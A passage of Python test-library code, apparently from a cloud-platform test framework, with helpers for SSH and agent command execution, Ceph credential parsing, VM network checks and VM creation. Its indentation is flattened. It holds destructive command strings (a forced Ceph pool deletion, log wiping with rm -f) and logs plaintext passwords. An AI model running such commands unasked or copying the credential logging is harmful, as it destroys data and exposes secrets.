return 1st ceph_host, username, password
'''
mons = monUrls.split(';')
mon1 = mons[0]
user_pass, ceph_host = mon1.split('@')
username, password = user_pass.split(':')
return ceph_host, username, password
def lib_install_testgent_to_ceph_host(monUrls):
ceph_host, username, password = lib_get_ceph_info(monUrls)
host = test_util.HostOption()
host.managementIp = ceph_host
test_util.test_logger('Install test agent to ceph host: %s' % ceph_host)
lib_install_testagent_to_host(host, username, password)
def lib_install_testagent_to_ceph_ps():
monUrls = os.environ.get('cephPrimaryStorageMonUrls')
lib_install_testgent_to_ceph_host(monUrls)
def lib_install_testagent_to_ceph_bs():
monUrls = os.environ.get('cephBackupStorageMonUrls')
lib_install_testgent_to_ceph_host(monUrls)
def lib_delete_ceph_pool(ceph_host, username, password, poolname):
command = 'ceph osd pool delete %s %s --yes-i-really-really-mean-it' % \
(poolname, poolname)
lib_execute_ssh_cmd(ceph_host, username, password, command)
def lib_get_ps_ceph_info_by_ps_inventory(ps_inv):
mon_one = ps_inv.mons[0].hostname
for key in os.environ.keys():
if mon_one in os.environ.get(key):
monUrls = os.environ.get(key).split(';')
for mon in monUrls:
if mon_one == mon.split('@')[1]:
username, password = mon.split('@')[0].split(':')
return mon_one, username, password
test_util.test_logger('did not find predefined mon url for ps: %s' % \
ps_inv.uuid)
def lib_get_bs_ceph_info_by_bs_inventory(bs_inv):
mon_one = bs_inv.mons[0].hostname
for key in os.environ.keys():
if mon_one in os.environ.get(key):
monUrls = os.environ.get(key).split(';')
for mon in monUrls:
if mon_one == mon.split('@')[1]:
username, password = mon.split('@')[0].split(':')
return mon_one, username, password
test_util.test_logger('did not find predefined mon url for bs: %s' % \
bs_inv.uuid)
#will clean up log files in virtual router to save is hard driver.
def lib_check_cleanup_vr_logs(vr_vm):
cleanup_cmd = "free_disk=`df --direct /var/log|grep 'var/log'|awk '{print $5}'|awk -F% '{print $1}'`; if [ $free_disk -ge 90 ]; then rm -f /var/log/zstack/*; rm -f /var/log/dnsmasq.log; fi"
vr_vm_mgmt_ip = lib_find_vr_mgmt_ip(vr_vm)
lib_install_testagent_to_vr_with_vr_vm(vr_vm)
lib_execute_sh_cmd_by_agent_with_retry(vr_vm_mgmt_ip, cleanup_cmd)
def lib_check_cleanup_vr_logs_by_vm(vm):
vr_vms = lib_find_vr_by_vm(vm)
for vr_vm in vr_vms:
lib_check_cleanup_vr_logs(vr_vm)
return True
def lib_ssh_vm_cmd_by_agent(test_agent_ip, vm_ip, username, password, command, timeout=SSH_TIMEOUT, retry=1):
cmd = vm_plugin.SshInVmCmd()
cmd.ip = vm_ip
cmd.username = username
cmd.password = password
cmd.command = command
cmd.timeout = timeout
rsp = None
rsp = lib_try_http_cmd(testagent.build_http_path(test_agent_ip, vm_plugin.SSH_GUEST_VM_PATH), cmd, retry)
return rsp
def lib_ssh_vm_cmd_by_agent_with_retry(test_agent_ip, vm_ip, username, password, command, expected_result = True):
'''
retry the ssh command if ssh is failed in TIMEOUT
Before this API, lib_set_vm_host_l2_ip() should be called to setup host
ip address for connect vm.
'''
timeout = time.time() + SSH_TIMEOUT
rsp = None
while time.time() < timeout:
try:
rsp = lib_ssh_vm_cmd_by_agent(test_agent_ip, vm_ip, username, \
password, command)
if expected_result and not rsp.success:
time.sleep(1)
continue
break
except:
test_util.test_logger('Execute ssh cmd: %s on :%s failed. Will try again in 1s.' % (command, test_agent_ip))
time.sleep(1)
else:
test_util.test_logger('Execute ssh cmd: %s on :%s failed for %s seconds. Give up trying.' % (command, test_agent_ip, SSH_TIMEOUT))
if not rsp:
test_util.test_logger('Meet exception when doing ssh [command:] %s in test [vm:] %s throught [host:] %s. ' % (command, vm_ip, test_agent_ip))
return False
if not rsp.success:
test_util.test_logger('Fail to execute ssh [command:] %s in test [vm:] %s throught [host:] %s. [error:] %s' % (command, vm_ip, test_agent_ip, rsp.error))
return False
if not rsp.result:
return True
return str(rsp.result)
def lib_execute_ssh_cmd(host_ip, username, password, command, timeout = 30, \
port = 22):
def ssh_host():
try:
ret, output, stderr = ssh.execute(command, host_ip, username, password, False, port)
print("ssh: %s , return value: %d, standard output:%s, standard error: %s" % (command, ret, output, stderr))
ssh_result['result'] = ret
ssh_result['output'] = output
ssh_result['err'] = stderr
return True
except Exception as e:
test_util.test_logger('[SSH] unable to ssh in host[ip:%s], assume its not ready. Exception: %s' % (host_ip, str(e)))
ssh_result['result'] = 'error'
return False
ssh_result = {'result': None, 'output': None, 'err': None}
thread = threading.Thread(target = ssh_host)
thread.daemon = True
thread.start()
time_out = time.time() + timeout
while ssh_result['result'] == None and time.time() < time_out:
time.sleep(0.5)
if ssh_result['result'] != None:
if ssh_result['result'] == 'error':
test_util.test_logger('ssh command:%s met exception.' % command)
return False
else:
test_util.test_logger('[SSH] ssh in vm[%s] doing %s, timeout after %s seconds' % (host_ip, command, timeout))
return False
test_util.test_logger('[SSH] ssh in vm[%s] doing %s done. result is %s' % (host_ip, command, ssh_result))
if ssh_result['result'] == 0:
return ssh_result['output']
return False
def lib_execute_sh_cmd_by_agent(test_agent_ip, command):
shell_cmd = host_plugin.HostShellCmd()
shell_cmd.command = command
rsp = lib_try_http_cmd(testagent.build_http_path(test_agent_ip, \
host_plugin.HOST_SHELL_CMD_PATH), shell_cmd)
return rsp
def lib_execute_sh_cmd_by_agent_with_retry(test_agent_ip, command, \
expected_result = True):
'''
execute shell command on target machine, which installed test agent. Will
try execute 3 times, if there is not success result. It is return False
params:
test_agent_ip: target machine ip address.
command: shell command, which will be executed.
return:
False: the shell command execute failed.
True: the shell command executed without stdout
STDOUT_LOG: the stdout log of shell command.
Before this API, lib_set_vm_host_l2_ip() should be called to setup host
ip address for connect vm.
'''
timeout = time.time() + SSH_TIMEOUT
rsp = None
while time.time() < timeout:
try:
rsp = lib_execute_sh_cmd_by_agent(test_agent_ip, command)
if expected_result and rsp.return_code != 0:
time.sleep(1)
continue
break
except:
test_util.test_logger('Execute shell cmd: %s on :%s failed. Will try again in 1s.' % (command, test_agent_ip))
time.sleep(1)
else:
test_util.test_logger('Execute shell cmd: %s on :%s failed for %s second. Give up trying.' % (command, test_agent_ip, SSH_TIMEOUT))
if not rsp:
test_util.test_logger('Execute shell [cmd:] %s ERROR on [target:] %s ' % (command, test_agent_ip))
return False
if rsp.return_code != 0:
test_util.test_logger('Execute shell [cmd:] %s ERROR on [target:] %s [info:] %s' % (command, test_agent_ip, rsp.stderr))
return False
if not rsp.stdout:
return True
#avoid of possible unicode result. Need a mandatory type translation
return str(rsp.stdout)
#-----------Check VM Status-------------
def lib_check_vm_network_status(vm):
lib_check_vm_running_status(vm)
lib_install_testagent_to_vr(vm)
if lib_check_vm_dhcp(vm):
test_util.test_logger('[vm:] %s mac/ip was assigned in VR /etc/host.dhcp' % vm.uuid)
else:
test_util.test_fail('cannot find mac/ip pair in vr for [vm:] %s' % vm.uuid)
lib_check_mac(vm)
lib_check_vm_resolv_conf(vm)
lib_check_ping_gateway(vm)
def lib_check_vm_dhcp(vm):
return _check_dhcp_cmd(vm, 'cat /etc/hosts.dhcp')
def lib_check_dhcp_leases(vm):
return _check_dhcp_cmd(vm, 'cat /etc/hosts.leases')
def _check_dhcp_cmd(vm, command):
vr_vms = lib_find_vr_by_vm(vm)
for vr_vm in vr_vms:
test_util.test_logger("Begin to check VM DHCP binding setting in VR: %s" % vr_vm.uuid)
vr_ip = lib_find_vr_pub_ip(vr_vm)
nic = lib_get_vm_nic_by_vr(vm, vr_vm)
guest_mac = nic.mac
lib_install_testagent_to_vr_with_vr_vm(vr_vm)
rsp = lib_execute_sh_cmd_by_agent(vr_ip, command)
if not rsp.success:
test_util.test_fail('cannot execute shell command: %s in %s. [error:] %s' % (command, vr_ip, rsp.error))
dhcp_res = str(rsp.result)
if not guest_mac in dhcp_res:
test_util.test_logger('[vm:] %s [mac:] %s is not found in %s .' % (vm.uuid, guest_mac, command))
return False
else:
test_util.test_logger('[vm:] %s [mac:] %s is found in %s .' % (vm.uuid, guest_mac, command))
return True
def lib_get_vm_blk_status(vm):
host = lib_get_vm_host(vm)
cmd = vm_plugin.VmStatusCmd()
cmd.vm_uuids = [vm.uuid]
test_util.test_logger('Begin to check [vm:] %s blk status on [host:] %s.' % (vm.uuid, host.name))
rspstr = http.json_dump_post(testagent.build_http_path(host.managementIp, vm_plugin.VM_BLK_STATUS), cmd)
rsp = jsonobject.loads(rspstr)
if rsp.vm_status[vm.uuid]:
test_util.test_logger('vm [uuid:%s] blk status: %s .' % (vm.uuid, jsonobject.dumps(rsp.vm_status[vm.uuid])))
return True
else:
test_util.test_logger('Can not get vm [uuid:%s] blk status.' % vm.uuid)
return False
def lib_check_vm_running_status(vm):
host = lib_get_vm_host(vm)
cmd = vm_plugin.VmStatusCmd()
cmd.vm_uuids = [vm.uuid]
test_util.test_logger('Begin to check [vm:] %s status on [host:] %s.' % (vm.uuid, host.name))
rspstr = http.json_dump_post(testagent.build_http_path(host.managementIp, vm_plugin.IS_VM_RUNNING_PATH), cmd)
rsp = jsonobject.loads(rspstr)
if rsp.vm_status[vm.uuid]:
test_util.test_logger('vm [uuid:%s] is running on host: %s .' % (vm.uuid, host.name))
return True
else:
test_util.test_logger('vm [uuid:%s] is not running on host: %s .' % (vm.uuid,host.name))
return False
def lib_check_vm_stopped_status(vm):
host = lib_get_vm_host(vm)
cmd = vm_plugin.VmStatusCmd()
cmd.vm_uuids = [vm.uuid]
rspstr = http.json_dump_post(testagent.build_http_path(host.managementIp, vm_plugin.IS_VM_STOPPED_PATH), cmd)
rsp = jsonobject.loads(rspstr)
if rsp.vm_status[vm.uuid]:
test_util.test_logger('vm[uuid:%s] is stopped on [host:] %s' % (vm.uuid, host.name))
return True
else:
test_util.test_logger('vm[uuid:%s] is not stopped on [host:] %s . Test failed' % (vm.uuid, host.name))
return False
def lib_check_vm_resolv_conf(vm):
imageUsername = lib_get_vm_username(vm)
imagePassword = lib_get_vm_password(vm)
vr_vms = lib_find_vr_by_vm(vm)
for vr_vm in vr_vms:
test_util.test_logger("Begin to check VM DNS setting behind of VR: %s" % vr_vm.uuid)
nic = lib_get_vm_nic_by_vr(vm, vr_vm)
if TestHarness == TestHarnessHost:
test_harness_ip = lib_find_host_by_vm(vm).managementIp
#assign host l2 bridge ip.
lib_set_vm_host_l2_ip(vm)
else:
test_harness_ip = lib_find_vr_mgmt_ip(vr_vm)
lib_install_testagent_to_vr_with_vr_vm(vr_vm)
guest_ip = nic.ip
command = 'cat /etc/resolv.conf'
username = lib_get_vm_username(vm)
password = lib_get_vm_password(vm)
rsp = lib_ssh_vm_cmd_by_agent(test_harness_ip, guest_ip, username, \
password, command)
if not rsp.success:
test_util.test_fail('cannot execute test ssh command in test vm. [error:] %s' % rsp.error)
dns_res = str(rsp.result)
vr_guest_ip = lib_find_vr_private_ip(vr_vm)
if vr_guest_ip in dns_res:
test_util.test_logger('[VR IP:] %s is set in guest vm /etc/resolv.conf of guest:%s . VM network checking pass.' % (vr_guest_ip, dns_res))
else:
test_util.test_fail('[Guest IP:] %s is not set in guest vm, content of /etc/resolv.conf of guest:%s' % (vr_guest_ip, dns_res))
#TODO: add check vlan operations.
def lib_check_vlan(vm):
pass
#consider possible connection failure on stress test. Better to repeat the same command several times.
def lib_try_http_cmd(http_path, cmd, times=5):
interval = 1
current_round = 1
exception = None
# avoid of too long time wait for impossible connection
timeout = time.time() + SSH_TIMEOUT
while current_round <= times and time.time() < timeout:
try:
current_round += 1
rspstr = http.json_dump_post(http_path, cmd)
rsp = jsonobject.loads(rspstr)
test_util.test_logger('http call response result: %s' % rspstr)
return rsp
except Exception as e:
test_util.test_logger('meet error when call zstack test agent API, will try again...the trace logs are:')
traceback.print_exc(file=sys.stdout)
exception = e
time.sleep(1)
test_util.test_logger('Error. [http connection:] %s with [command:] %s is failed %s times execution.' % (http_path, cmd.command, times))
raise test_util.TestError(str(exception))
#check guest mac address and ip address
def lib_check_mac(vm):
vr_vms = lib_find_vr_by_vm(vm)
for vr_vm in vr_vms:
test_util.test_logger("Begin to check IP/MAC for [VM:] %s behind of [VR:] %s" % (vm.uuid, vr_vm.uuid))
nic = lib_get_vm_nic_by_vr(vm, vr_vm)
guest_ip = nic.ip
guest_mac = nic.mac
if TestHarness == TestHarnessHost:
test_harness_ip = lib_find_host_by_vm(vm).managementIp
#assign host l2 bridge ip.
lib_set_vm_host_l2_ip(vm)
else:
test_harness_ip = lib_find_vr_mgmt_ip(vr_vm)
lib_install_testagent_to_vr_with_vr_vm(vr_vm)
command = '/sbin/ip a'
username = lib_get_vm_username(vm)
password = lib_get_vm_password(vm)
rsp = lib_ssh_vm_cmd_by_agent(test_harness_ip, guest_ip, username, \
password, command)
if not rsp.success:
test_util.test_fail('Cannot execute test ssh command in test vm through [ip:] %s. [error:] %s' % (test_harness_ip, rsp.error))
ip_res = str(rsp.result)
if (guest_mac in ip_res) or (string.upper(guest_mac) in ip_res):
test_util.test_logger('[MAC:] %s is set in guest vm, guest IP is: %s . VM MAC checking pass.' % (guest_mac, guest_ip))
#test_util.test_logger('ifconfig result: %s' % ip_res)
else:
test_util.test_fail('[MAC:] %s is not found in guest vm, guest IP is:%s . VM MAC checking fail.' % (guest_mac, guest_ip))
def lib_is_vm_vr(vm):
'''
Return True if vm is an appliance vm.
'''
cond = res_ops.gen_query_conditions('uuid', '=', vm.uuid)
vr = res_ops.query_resource(res_ops.APPLIANCE_VM, cond)
if vr:
return True
#login vm and ping target
def lib_check_ping(vm, target, no_exception=None):
'''target is IP address or hostname'''
vr_vms = lib_find_vr_by_vm(vm)
command = 'ping -c 3 -W 5 %s >/tmp/ping_result 2>&1' % target
if lib_is_vm_vr(vm):
vm_ip = lib_find_vr_pub_ip(vm)
lib_install_testagent_to_vr_with_vr_vm(vm)
if lib_execute_sh_cmd_by_agent_with_retry(vm_ip, command):
test_util.test_logger("Ping [target:] %s from [vm:] %s Test Pass" % (target, vm.uuid))
else:
if not no_exception:
test_util.test_fail("Fail: [vm:] %s ping target: %s fail. [error:] %s" %(vm.uuid, target, rsp.error))
else:
test_util.test_logger("Fail: [vm:] %s ping target: %s fail. [error:] %s" %(vm.uuid, target, rsp.error))
else:
vr_vm = vr_vms[0]
nic = lib_get_vm_nic_by_vr(vm, vr_vm)
guest_ip = nic.ip
if TestHarness == TestHarnessHost:
test_harness_ip = lib_find_host_by_vm(vm).managementIp
#assign host l2 bridge ip.
lib_set_vm_host_l2_ip(vm)
print 'test_harness ip: %s' % test_harness_ip
else:
test_harness_ip = lib_find_vr_mgmt_ip(vr_vm)
lib_install_testagent_to_vr_with_vr_vm(vr_vm)
test_util.test_logger("Begin to test ping target: %s from VM through L3 behind of VR: %s by connection from test_harness: %s" % (target, vr_vm.uuid, test_harness_ip))
username = lib_get_vm_username(vm)
password = lib_get_vm_password(vm)
rsp = lib_ssh_vm_cmd_by_agent(test_harness_ip, guest_ip, username, \
password, command)
if not rsp.success:
if not no_exception:
test_util.test_fail("Fail: [vm:] %s ping target: %s fail. [error:] %s" %(vm.uuid, target, rsp.error))
else:
test_util.test_logger("Fail: [vm:] %s ping target: %s fail. [error:] %s" %(vm.uuid, target, rsp.error))
return False
test_util.test_logger("Ping [target:] %s from [vm:] %s Test Pass" % (target, vm.uuid))
#return True
return True
def lib_check_directly_ping(target_ip):
try:
shell.call('ping -c 1 -W 1 %s' % target_ip)
except:
test_util.test_logger('ping %s failed' % target_ip)
return False
else:
test_util.test_logger('ping %s successfully' % target_ip)
return True
#login vm and ping gateway
def lib_check_ping_gateway(vm, no_exception=None):
'''
Ping gateway.
'''
return lib_check_ping(vm, vm.vmNics[0].gateway, no_exception)
def lib_check_ping_external_machine(vm, no_exception=None):
'''
Ping pre-setting external machine in plan.xml.
Check if dns and dhcp is setting correctly.
'''
return lib_check_ping(vm, test_config.pingTestTarget.text_, no_exception)
def lib_scp_file_to_vm(vm, src_file, dst_file, l3_uuid = None):
'''
scp source file to destination in vm.
@params:
vm: target vm
src_file: source file in current host
dst_file: destination file name in vm. dst_folder should be ready.
l3_uuid: the optional l3 uuid for find target vm's nic
@return:
scp response object: scp successfully
False: scp failed
'''
def _full_path(path):
if path.startswith('~'):
return os.path.expanduser(path)
elif path.startswith('/'):
return path
else:
return os.path.join(self.config_base_path, path)
if os.environ.get('zstackManagementIp') == None:
lib_set_vm_host_l2_ip(vm)
host_ip = lib_find_host_by_vm(vm).managementIp
target_host_in_plan = None
for host_in_plan in lib_get_all_hosts_from_plan():
if host_in_plan.managementIp_ == host_ip:
target_host_in_plan = host_in_plan
break
if target_host_in_plan != None:
h_username = target_host_in_plan.username_
h_password = target_host_in_plan.password_
if hasattr(target_host_in_plan, 'port_'):
h_port = int(target_host_in_plan.port_)
else:
h_port = 22
else:
h_username = os.environ.get('hostUsername')
h_password = os.environ.get('hostPassword')
h_port = 22
temp_script = '/tmp/%s' % uuid.uuid1().get_hex()
#copy the target script to target host firstly.
src_file = _full_path(src_file)
ssh.scp_file(src_file, temp_script, host_ip, h_username, h_password, port=h_port)
username = lib_get_vm_username(vm)
password = lib_get_vm_password(vm)
if not l3_uuid:
vm_ip = vm.vmNics[0].ip
else:
vm_ip = lib_get_vm_nic_by_l3(vm, l3_uuid).ip
#copy the target script to target vm
scp_cmd = vm_plugin.SshInVmCmd()
scp_cmd.ip = vm_ip
scp_cmd.username = username
scp_cmd.password = password
scp_cmd.src_file = temp_script
scp_cmd.dst_file = dst_file
rspstr = http.json_dump_post(testagent.build_http_path(host_ip, vm_plugin.SCP_GUEST_VM_PATH), scp_cmd)
rsp = jsonobject.loads(rspstr)
if not rsp.success:
test_util.test_logger('scp error info: %s' % rsp.error)
return False
#cleanup temporay script in host.
ssh.execute('rm -f %s' % temp_script, host_ip, h_username, h_password, port=h_port)
return rsp
def lib_execute_shell_script_in_vm(vm_inv, script_file, l3_uuid=None, timeout=SSH_TIMEOUT):
'''
execute shell script in vm. Will only use vm's host to ssh vm
@params:
vm_inv: target vm to execute the script file
script_file: the local script file, which will be copied and runned on
target vm.
l3_uuid: [optional] l3_uuid for target vm's nic. It is used, when VM has
multiple nics.
timeout: [default:60s] the script should be executed completed in timeout.
@return:
ssh response object: Pass
False: ssh fail
'''
lib_set_vm_host_l2_ip(vm_inv)
host_ip = lib_find_host_by_vm(vm_inv).managementIp
h_username = os.environ.get('hostUsername')
h_password = os.environ.get('hostPassword')
temp_script = '/tmp/%s' % uuid.uuid1().get_hex()
if not lib_scp_file_to_vm(vm_inv, script_file, temp_script, l3_uuid):
return False
if not l3_uuid:
vm_ip = vm_inv.vmNics[0].ip
else:
vm_ip = lib_get_vm_nic_by_l3(vm_inv, l3_uuid).ip
command = 'sh %s' % temp_script
username = lib_get_vm_username(vm_inv)
password = lib_get_vm_password(vm_inv)
rsp = lib_ssh_vm_cmd_by_agent(host_ip, vm_ip, username, \
password, command, timeout)
if not rsp.success:
test_util.test_logger('ssh error info: %s when execute [script:] %s in [vm:] %s ' % (rsp.error, open(script_file).readlines(), vm_inv.uuid))
return False
test_util.test_logger('Successfully execute [script:] >>> %s <<< in [vm:] %s' % \
(script_file, vm_inv.uuid))
print rsp.result
#cleanup temporay script in host.
ssh.execute('rm -f %s' % temp_script, host_ip, h_username, h_password)
return rsp
def lib_execute_command_in_vm(vm, cmd, l3_uuid=None):
'''
The cmd was assumed to be returned as soon as possible.
'''
vr_vm = lib_find_vr_by_vm(vm)
ret = True
#if vr_vm[0].uuid == vm.uuid:
# lib_install_testagent_to_vr_with_vr_vm(vm)
# try:
# vm_ip = lib_find_vr_mgmt_ip(vm)
# vr_vm = vm
# except:
# test_util.test_logger("[vm:] %s is not a VR or behind any VR. Can't connect to it to execute [cmd:] %s " % (vm.uuid, cmd))
# return False
# shell_cmd = host_plugin.HostShellCmd()
# shell_cmd.command = cmd
# rspstr = http.json_dump_post(testagent.build_http_path(vm_ip, host_plugin.HOST_SHELL_CMD_PATH), shell_cmd)
# rsp = jsonobject.loads(rspstr)
# if rsp.return_code != 0:
# ret = False
# test_util.test_logger('shell error info: %s' % rsp.stderr)
# else:
# ret = rsp.stdout
#else:
# vr_vm = vr_vm[0]
# if TestHarness == TestHarnessHost:
# #assign host l2 bridge ip.
# lib_set_vm_host_l2_ip(vm)
# test_harness_ip = lib_find_host_by_vm(vm).managementIp
# else:
# test_harness_ip = lib_find_vr_mgmt_ip(vr_vm)
# if not l3_uuid:
# vm_ip = vm.vmNics[0].ip
# else:
# vm_ip = lib_get_vm_nic_by_l3(vm, l3_uuid).ip
# ssh_cmd = vm_plugin.SshInVmCmd()
# ssh_cmd.ip = vm_ip
# ssh_cmd.username = lib_get_vr_image_username(vr_vm)
# ssh_cmd.password = lib_get_vr_image_password(vr_vm)
# ssh_cmd.command = cmd
# rspstr = http.json_dump_post(testagent.build_http_path(test_harness_ip, vm_plugin.SSH_GUEST_VM_PATH), ssh_cmd)
# rsp = jsonobject.loads(rspstr)
# if not rsp.success:
# ret = False
# test_util.test_logger('ssh error info: %s' % rsp.error)
# else:
# ret = str(rsp.result)
vr_vm = vr_vm[0]
if TestHarness == TestHarnessHost:
#assign host l2 bridge ip.
lib_set_vm_host_l2_ip(vm)
test_harness_ip = lib_find_host_by_vm(vm).managementIp
else:
test_harness_ip = lib_find_vr_mgmt_ip(vr_vm)
lib_install_testagent_to_vr_with_vr_vm(vr_vm)
if lib_is_vm_vr(vm):
vm_ip = lib_find_vr_mgmt_ip(vm)
else:
if not l3_uuid:
vm_ip = vm.vmNics[0].ip
else:
vm_ip = lib_get_vm_nic_by_l3(vm, l3_uuid).ip
username = lib_get_vm_username(vm)
password = lib_get_vm_password(vm)
test_util.test_logger("Do testing through test agent: %s to ssh vm: %s, ip: %s, with cmd: %s" % (test_harness_ip, vm.uuid, vm_ip, cmd))
rsp = lib_ssh_vm_cmd_by_agent(test_harness_ip, vm_ip, username, \
password, cmd)
if not rsp.success:
ret = False
test_util.test_logger('ssh error info: %s' % rsp.error)
else:
if rsp.result != None:
ret = str(rsp.result)
if ret == "":
ret = "<no stdout output>"
else:
ret = rsp.result
if ret:
test_util.test_logger('Successfully execute [command:] >>> %s <<< in [vm:] %s' % (cmd, vm_ip))
return ret
else:
test_util.test_logger('Fail execute [command:] %s in [vm:] %s' % (cmd, vm_ip))
return False
def lib_check_login_in_vm(vm, username, password, retry_times=5, l3_uuid=None):
'''
Check login with the assigned username and password.
'''
cmd = "exit 0"
ret = True
count = 1
if not l3_uuid:
vm_ip = vm.vmNics[0].ip
else:
vm_ip = lib_get_vm_nic_by_l3(vm, l3_uuid).ip
if not lib_wait_target_up(vm_ip, '22', 120):
test_util.test_fail('vm: %s is not startup in 120 seconds. Fail to reboot it. ' % vm.uuid)
while(count <= retry_times):
test_util.test_logger("retry count:%s, vm_ip:%s, username:%s, password:%s, cmd:%s" %(str(count), str(vm_ip), str(username), str(password), str(cmd)))
try:
ret, output, stderr = ssh.execute(cmd, vm_ip, username, password, False, 22)
except:
pass
if ret == 0:
test_util.test_logger("successfully login vm: %s" %(vm_ip))
return True
time.sleep(1)
count = count + 1
#if count > retry_times: retry one more time to raise the exception.
test_util.test_logger("Failed login vm: %s, retry count bigger than max retry %s times" %(vm_ip, str(retry_times)))
ret, output, stderr = ssh.execute(cmd, vm_ip, username, password, False, 22)
return False
#-----------VM operations-------------
def lib_create_vm(vm_cre_opt=test_util.VmOption(), session_uuid=None):
'''If not provide vm_cre_opt, it creates random vm '''
if not vm_cre_opt.get_name():
vm_cre_opt.set_name('test-vm')
if not vm_cre_opt.get_instance_offering_uuid():
#pick up random user vm instance offering.
instance_offerings = res_ops.get_resource(res_ops.INSTANCE_OFFERING, session_uuid)
user_vm_offerings = []
for instance in instance_offerings:
if instance.type == 'UserVm':
user_vm_offerings.append(instance)
vm_cre_opt.set_instance_offering_uuid(random.choice(user_vm_offerings).uuid)
if not vm_cre_opt.get_image_uuid():
#pick up random image
images = lib_get_not_vr_images()
#Virtual Router image is CentOS image, which will automatically create /etc/udev/rules.d/70-persistent-net.rules. If the CentOS image was bootup and save as a new image template, when the other VM using the new template, its valid network device will be eth1, rather than eth0. But there isn't eth1 config in CentOS image, so it will cause VM networking checking failure. In Robot testing, we have to avoid of using virtual router image.
#images = lib_remove_image_from_list_by_desc(images, img_desc="virtual router image")
image = random.choice(images)
vm_cre_opt.set_image_uuid(image.uuid)
#pick up random l3 network
if not vm_cre_opt.get_l3_uuids():
#If setting zone_uuid, will pick a l3 from this zone.
zone_uuid = vm_cre_opt.get_zone_uuid()
if not zone_uuid:
cluster_uuid = vm_cre_opt.get_cluster_uuid()
if not cluster_uuid:
host_uuid = vm_cre_opt.get_host_uuid()
if host_uuid:
zone_uuid = res_ops.get_resource(res_ops.HOST, uuid = host_uuid)[0].zoneUuid
else:
zone_uuid = res_ops.get_resource(res_ops.CLUSTER, uuid = cluster_uuid)[0].zoneUuid
vm_cre_opt.set_l3_uuids([lib_get_random_l3(zone_uuid = zone_uuid).uuid])
test_util.test_logger('VM creation selection: [image uuid:] %s; [l3 uuid:] %s' % (vm_cre_opt.image_uuid, vm_cre_opt.l3_uuids))
if not vm_cre_opt.get_timeout():
vm_cre_opt.set_timeout(300000 + 300000*len(vm_cre_opt.l3_uuids))
#To avoid of import loop, move this import here.
#[Inlined import]
import zstackwoodpecker.zstack_test.zstack_test_vm as zstack_vm_header
vm = zstack_vm_header.ZstackTestVm()
vm.set_creation_option(vm_cre_opt)
vm.create()
return vm
def lib_create_vm_static_ip_tag(l3_uuid, ip_address):
return 'staticIp::%s::%s' % (l3_uuid, ip_address)
def lib_create_vm_hostname_tag(hostname):
hostname = '-'.join(hostname.split('_'))
return 'hostname::%s' % hostname
def lib_vm_random_idel_time(min_stay_time=1, max_stay_time=120):
random_time_interval = 1
random_exist_time = random.randrange(min_stay_time, max_stay_time, random_time_interval)
test_util.test_logger('[Random stay:] will stay for %s seconds .' % random_exist_time)
time.sleep(random_exist_time)
test_util.test_logger('[Random stay:] have stayed for %s seconds .' % random_exist_time)
#-----------Get Host resource-------------
def lib_is_image_kvm(image):
if lib_get_hv_type_of_image(image) == inventory.KVM_HYPERVISOR_TYPE:
return True
else:
return False
#does image type is simulator type.
def lib_is_image_sim(image):
if lib_get_hv_type_of_image(image) == inventory.SIMULATOR_HYPERVISOR_TYPE:
return True
else:
return False
def lib_is_image_vcenter(image):
if lib_get_hv_type_of_image(image) == inventory.VMWARE_HYPERVISOR_TYPE:
return True
else:
return False
#Does VM's hypervisor is KVM.
def lib_is_vm_kvm(vm):
if lib_get_hv_type_of_vm(vm) == inventory.KVM_HYPERVISOR_TYPE:
return True
else:
return False
def lib_is_vm_sim(vm):
if lib_get_hv_type_of_vm(vm) == inventory.SIMULATOR_HYPERVISOR_TYPE:
return True
else:
return False
def lib_is_vm_vcenter(vm):
if lib_get_hv_type_of_vm(vm) == inventory.VMWARE_HYPERVISOR_TYPE:
return True
else:
return False
def lib_is_sharable_volume(volume):
if str(volume.isShareable).strip().lower() == "true":
return True
else:
return False
def lib_get_hv_type_of_vm(vm):
#host = lib_get_vm_host(vm)
#return host.hypervisorType
return vm.hypervisorType
def lib_get_hv_type_of_image(image):
image_format = image.format
if image_format == 'qcow2' or image_format == 'raw':
return 'KVM'
test_util.test_warn('not supported format: %s in test' % image_format)
def lib_get_hv_type_of_cluster(cluster):
return cluster.hypervisorType
def lib_get_hv_type_of_host(host):
return host.hypervisorType
def lib_get_all_hosts_from_plan():
hosts = []
for zone in deploy_config.zones.get_child_node_as_list('zone'):
for cluster in zone.clusters.get_child_node_as_list('cluster'):
for host in cluster.hosts.get_child_node_as_list('host'):
hosts.append(host)
return hosts
def lib_get_cluster_hosts(cluster_uuid = None):
if cluster_uuid:
conditions = res_ops.gen_query_conditions('clusterUuid', '=', \
cluster_uuid)
else:
conditions = res_ops.gen_query_conditions('clusterUuid', '!=', \
'impossible_uuid')
hosts = res_ops.query_resource(res_ops.HOST, conditions)
return hosts
def lib_get_vm_host(vm):
vm_host_uuid = vm.hostUuid
if not vm_host_uuid:
vm_host_uuid = vm.lastHostUuid
#In local storage environment, if VM is stopped or Destroyed, and its root
# volume was migrated to another host. It doesn't have current Host Uuid
# and its lastHostUuid can not reflect its real HostUuid for new start up.
# So we need to use root volume to check the real location.
if vm.state != inventory.RUNNING and not lib_check_vm_live_migration_cap(vm):
root_volume = lib_get_root_volume(vm)
ls_ref = lib_get_local_storage_reference_information(root_volume.uuid)[0]
vm_host_uuid = ls_ref.hostUuid
hosts = res_ops.get_resource(res_ops.HOST, session_uuid=None, \
uuid=vm_host_uuid)
if hosts:
#test_util.test_logger('[vm:] %s [host uuid:] %s [host name:] %s is found' % (vm.uuid, host.uuid, host.name))
return hosts[0]
else:
test_util.test_logger('Did not find [vm:] %s host' % vm.uuid)
def lib_get_vm_last_host(vm_inv):
'''
Get last host inventory by providing vm inventory.
'''
last_host_uuid = vm_inv.lastHostUuid
if not last_host_uuid:
test_util.test_logger("Last Host UUID is None. Can't get Last Host Inventory for [vm:] %s" % vm_inv.uuid)
return None
hosts = res_ops.get_resource(res_ops.HOST, session_uuid=None, \
uuid=last_host_uuid)
if hosts:
return hosts[0]
else:
test_util.test_logger("Can't get Last Host Inventory for [vm:] %s, maybe the host has been deleted." % vm_inv.uuid)
return None
def lib_get_host_by_uuid(host_uuid):
conditions = res_ops.gen_query_conditions('uuid', '=', host_uuid)
hosts = res_ops.query_resource(res_ops.HOST, conditions)
if hosts:
return hosts[0]
def lib_get_host_by_ip(host_ip):
conditions = res_ops.gen_query_conditions('managementIp', '=', host_ip)
hosts = res_ops.query_resource(res_ops.HOST, conditions)
if hosts:
return hosts[0]
def lib_get_primary_storage_uuid_list_by_backup_storage(bs_uuid):
'''
Get primary storage uuid list, which belongs to the zone of backup storage
